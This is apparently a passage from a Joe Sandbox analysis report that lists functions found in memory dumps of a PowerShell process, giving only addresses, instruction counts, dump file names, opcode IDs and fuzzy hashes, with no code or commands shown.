                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: aacffebeff4c6726d3697c6f09c69053ad3c5e02fea56d7944cc36f34af9fdb7
                              • Instruction ID: 42529e3a04328ef3aceb9c8e497c9a7849215b1846c55ddfb617b942e08f5d35
                              • Opcode Fuzzy Hash: aacffebeff4c6726d3697c6f09c69053ad3c5e02fea56d7944cc36f34af9fdb7
                              • Instruction Fuzzy Hash: 09F04435200700DFC7159F52E410A9777A7EB45312F50886DE55A8B654CB36E8109B80
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 06F15772 Relevance: .0, Instructions: 35COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.439335533.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6f10000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7d00d354bfd2bd1fe7f3b978ea45bf573a9e78c7bc4f666d4ce443351bc649d6
                              • Instruction ID: 93a453957e2f92ec15e4d4404c3ceef3e0b6e63c620bd57160a2edd1d6dfcc18
                              • Opcode Fuzzy Hash: 7d00d354bfd2bd1fe7f3b978ea45bf573a9e78c7bc4f666d4ce443351bc649d6
                              • Instruction Fuzzy Hash: 14F03732000249BFCF129FA4DC41CDA3FB6FF0D258B459445FA4046630D632E965EFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 06768E47 Relevance: .0, Instructions: 34COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d1d27e3287e372a4445709a494c706ae1a4923b6798a9c7a80a8b48ca89b37d2
                              • Instruction ID: 1b84cc919cae0ad3918b2099928231516e6468fd4fd14ba5a60485cabb7928f8
                              • Opcode Fuzzy Hash: d1d27e3287e372a4445709a494c706ae1a4923b6798a9c7a80a8b48ca89b37d2
                              • Instruction Fuzzy Hash: ADF08977704114AFC7059F55AC4499AFBAAEF8E134710817AE5089B714CB729C1687D4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 06F157CC Relevance: .0, Instructions: 33COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.439335533.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6f10000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dea814371e78bbd603c3e95fb8a251c86ecd0103356eb217491ff8772f0d60fb
                              • Instruction ID: 65dc008a3adc8cb5e34ab0d80f1a333c325b787160a29e8e608d5fb7a436516d
                              • Opcode Fuzzy Hash: dea814371e78bbd603c3e95fb8a251c86ecd0103356eb217491ff8772f0d60fb
                              • Instruction Fuzzy Hash: 4CF04973104249EFCF929F94CC40CE93F72FF59254B044549FA454A630E332E925EB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 06F15718 Relevance: .0, Instructions: 33COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.439335533.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6f10000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8f2d3505c943ed15811d25570c1f05dd834d4ffc28a554664fe240808f31bad6
                              • Instruction ID: aeb15aca885c25742e815eafd195e5e81800c943e8b98833d8e1a8ede4fca3e1
                              • Opcode Fuzzy Hash: 8f2d3505c943ed15811d25570c1f05dd834d4ffc28a554664fe240808f31bad6
                              • Instruction Fuzzy Hash: 42F0CF3310024DBB8F62AE95DD00CDE3F76FF88658B059519FA0456620D672E865EB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676B226 Relevance: .0, Instructions: 30COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: add492b60c8240efe1af08afcc02f6867954b6b80200abdf34269c053490ed82
                              • Instruction ID: 07e06ea3aeb965af798342dbbb6806bd29cb0267edd60d3f4251ddc2bab6e961
                              • Opcode Fuzzy Hash: add492b60c8240efe1af08afcc02f6867954b6b80200abdf34269c053490ed82
                              • Instruction Fuzzy Hash: 21F027307006008FD32ADA29D448BBB37DAEBC6741F04807DE0458B780CB74DC81C391
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 06F150B0 Relevance: .0, Instructions: 30COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.439335533.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6f10000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fb81858c5b673e83947d3405ad9b19c49188c8e7d2a5e55ab51a16d413e4ad0b
                              • Instruction ID: 7f049dabdd0ff8e671cc32082f4de8565d792e2c0ec448e6230033b2a5ae6749
                              • Opcode Fuzzy Hash: fb81858c5b673e83947d3405ad9b19c49188c8e7d2a5e55ab51a16d413e4ad0b
                              • Instruction Fuzzy Hash: BDE0E532B002148BCB18966CD8144EE77EBEBC8221F04007AD602E7704CF75DC058BD0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676B228 Relevance: .0, Instructions: 29COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 96bb68cb4b2a3a261e8a6984d2592ea2677ebf846ab5937480cfebcea9e6fe48
                              • Instruction ID: bfec1a9fd2d8f34ff4cd428450dda50b13998e9b48536175a4390c591fea9bdd
                              • Opcode Fuzzy Hash: 96bb68cb4b2a3a261e8a6984d2592ea2677ebf846ab5937480cfebcea9e6fe48
                              • Instruction Fuzzy Hash: B2F0A7307006408FD32ADA69D4487BA37D6EBC6755F04847DE4558B791CB74DC91C791
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 06768E58 Relevance: .0, Instructions: 29COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d4c74491a016b9d0ed20563772eab9867ca8bbba2d0dcbccaca5ca3a779aac19
                              • Instruction ID: 3b43dfbbb138705ebe52dec5e87d3885c030bfb6092b7eda02ea26e09b72996d
                              • Opcode Fuzzy Hash: d4c74491a016b9d0ed20563772eab9867ca8bbba2d0dcbccaca5ca3a779aac19
                              • Instruction Fuzzy Hash: 3DE06576304214AF97049F59AC4485EFBAAFBCD274310813EE5189B310C732AC02C7E0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 06F1F67A Relevance: .0, Instructions: 29COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.439335533.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6f10000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: facbf968b3edd730468d6efdfbd5cdf93e47e9ae0e8c656a1009562385e1ae9a
                              • Instruction ID: 82f8f9d51db325c8f2b368347d4d120dda070162fbe0ff940b5b6f406eeb40ca
                              • Opcode Fuzzy Hash: facbf968b3edd730468d6efdfbd5cdf93e47e9ae0e8c656a1009562385e1ae9a
                              • Instruction Fuzzy Hash: 59E0D8337092947F9B011AA6AC44CEBBFAEFE9A2A13494066FA08C6111CA354D11C7B1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 06F15780 Relevance: .0, Instructions: 27COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.439335533.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6f10000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 873cf5d32e3e89ffb1b6a7610638b7ac57c27fccd7758b5f135e6d509521def7
                              • Instruction ID: 3e99b6e263b0845d7a4d4e7140f7867c4f9160711546af2ddee20ba938269b3b
                              • Opcode Fuzzy Hash: 873cf5d32e3e89ffb1b6a7610638b7ac57c27fccd7758b5f135e6d509521def7
                              • Instruction Fuzzy Hash: 2DF0BC3210024DBF8F52AF94D900CDA3BA6FF08268B409505FA4456620D672E9A4AB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676A0D9 Relevance: .0, Instructions: 25COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e2dd71b589a518f10a1148e1ac07e86ab3a07bb5788eb45fa9cf2628a3636cdc
                              • Instruction ID: 03ab6e2a8042f68199e60f7761c54ab350d5cc10341dda00c966fc633c7ef73f
                              • Opcode Fuzzy Hash: e2dd71b589a518f10a1148e1ac07e86ab3a07bb5788eb45fa9cf2628a3636cdc
                              • Instruction Fuzzy Hash: 63E0CD773402206B81156AD9FC065DBB75FEBC5A613184527F50BC7740DD51DC5143EB
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676E12A Relevance: .0, Instructions: 25COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2b1836f6f87e3755fc418c2254f7e0a6e02c1654177a03d0172c4be66f4276c3
                              • Instruction ID: bb7202a88d5f3b6d1e654c6200ca747ffed31b76b68aa430aa32a4781a74b052
                              • Opcode Fuzzy Hash: 2b1836f6f87e3755fc418c2254f7e0a6e02c1654177a03d0172c4be66f4276c3
                              • Instruction Fuzzy Hash: 26E0D83A3281508FC38A673AA85D9797BA79FC621271844BAE149CF2B2C6248805D351
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676D518 Relevance: .0, Instructions: 24COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 62f96059f5b0af10f78d28d84f785ecef7ddf526b08b2fe658d26cc4a2acb0b0
                              • Instruction ID: 86b5bedc32ef13d6226d782fea4c144a387ee445ba7fd963390a86f78559dde6
                              • Opcode Fuzzy Hash: 62f96059f5b0af10f78d28d84f785ecef7ddf526b08b2fe658d26cc4a2acb0b0
                              • Instruction Fuzzy Hash: F3E0C2762052601FC30166A8D8108C63FADDF4A21470100A7F008CB362CA959C4287F5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 06F17261 Relevance: .0, Instructions: 24COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.439335533.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6f10000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 140683bd47638b2940da81ed4933e407c0962c3f326db04fed346fd20a021d66
                              • Instruction ID: 0db6d12224f90b528b0373e5faf7642f96b488015252ce3f4a2fc52f049d2850
                              • Opcode Fuzzy Hash: 140683bd47638b2940da81ed4933e407c0962c3f326db04fed346fd20a021d66
                              • Instruction Fuzzy Hash: 85F0ED31A01244EFCB44CFB4D8A26EE7BB2EF81204F1048EED049DB290DA312F049B51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676B391 Relevance: .0, Instructions: 23COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8b4b40a83d4be0775603b957b4dafe9f0d253d829afb3d18ff4ad8606039b7be
                              • Instruction ID: b68f06ff5cbb64408dc058ff2434f9fb969c469353c514f00f39bb87f8316cfa
                              • Opcode Fuzzy Hash: 8b4b40a83d4be0775603b957b4dafe9f0d253d829afb3d18ff4ad8606039b7be
                              • Instruction Fuzzy Hash: 72E0C23230A2846FD342C7216C60CEBBFAADAD1110B0A845BF599C6052C6308426C7B2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676A0E8 Relevance: .0, Instructions: 20COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a7fe1cda99acc0d70004956b9bf1e4125db0227fcd6388bed31f175a2d42c0f7
                              • Instruction ID: ad9aa67caee6018fcb656826bd7601c2c8235e07dcd6cc68f614050418e3ca69
                              • Opcode Fuzzy Hash: a7fe1cda99acc0d70004956b9bf1e4125db0227fcd6388bed31f175a2d42c0f7
                              • Instruction Fuzzy Hash: 35D0A73A3006206B45047A9EE40089FF79FEFC9EA1304052AEA1AC7344CE61EC1243EA
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 06F17270 Relevance: .0, Instructions: 19COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.439335533.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6f10000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f127144fb1d16bdba3efad782ed0065fab785d9b9854dcc4b862c070ad24be89
                              • Instruction ID: d26d51dabfd4b60b082a90a33c5e6271dd21ee3f6cb9feefb10843fa4cd4d13b
                              • Opcode Fuzzy Hash: f127144fb1d16bdba3efad782ed0065fab785d9b9854dcc4b862c070ad24be89
                              • Instruction Fuzzy Hash: C5E08634A01308EFCB44DFA5D9115DE73BADB45245F5048ADD5099B340DE316F009B91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676A278 Relevance: .0, Instructions: 18COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 812087c4c8cacdb621c5b0e03e4694bc52d0576d7c8fca60f7fb3f6a0b537eac
                              • Instruction ID: f100fdb3476888e1cce9908bb9cbec0ca413d2e7846bef4361ff3b2480b665d1
                              • Opcode Fuzzy Hash: 812087c4c8cacdb621c5b0e03e4694bc52d0576d7c8fca60f7fb3f6a0b537eac
                              • Instruction Fuzzy Hash: E3E0E574A40209CFDB54DF95D0A8BAEBBF0AF48314F188409E902A7291C7349841CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 06F1F080 Relevance: .0, Instructions: 16COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.439335533.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6f10000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8d165a16e30ba3ea7428c1686e75e00d8f5800b3d7017eb376805eb682b1374e
                              • Instruction ID: f4df4fd98a6a36d961551e8c8390e2f4fcd05e379f5b25216d330ed5fdd3f478
                              • Opcode Fuzzy Hash: 8d165a16e30ba3ea7428c1686e75e00d8f5800b3d7017eb376805eb682b1374e
                              • Instruction Fuzzy Hash: 3DD05E392102209FC745EB6AE408EC677A9EF48225B014096E909CB322CA35DC008B91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676D528 Relevance: .0, Instructions: 14COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 84023c6350526eba8d427f35244b139e1c579c1432a3142972f33cf25e58591b
                              • Instruction ID: 2c155823ff119461de6026dd9fcc419b42e4b8a57189c6a788ee96a5249ff1a3
                              • Opcode Fuzzy Hash: 84023c6350526eba8d427f35244b139e1c579c1432a3142972f33cf25e58591b
                              • Instruction Fuzzy Hash: ABC012313100344BC604A65CE44495937DDDB49728B0100B6E509CB361CA96EC4187D9
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 06766243 Relevance: .0, Instructions: 12COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1b516523a415f35318928acc9fb1083f7c4757441b6e72b36890ae947cb6978e
                              • Instruction ID: a45cfb3c837d0e686637fac9e822a45596afe1de15fca1538e87ee8a87696f0f
                              • Opcode Fuzzy Hash: 1b516523a415f35318928acc9fb1083f7c4757441b6e72b36890ae947cb6978e
                              • Instruction Fuzzy Hash: 27D0CA3BA0011CAFCF008AC0E840ACDFB32FB88362F008022E7106A160C27219AADB80
                              Uniqueness

                              Uniqueness Score: -1.00%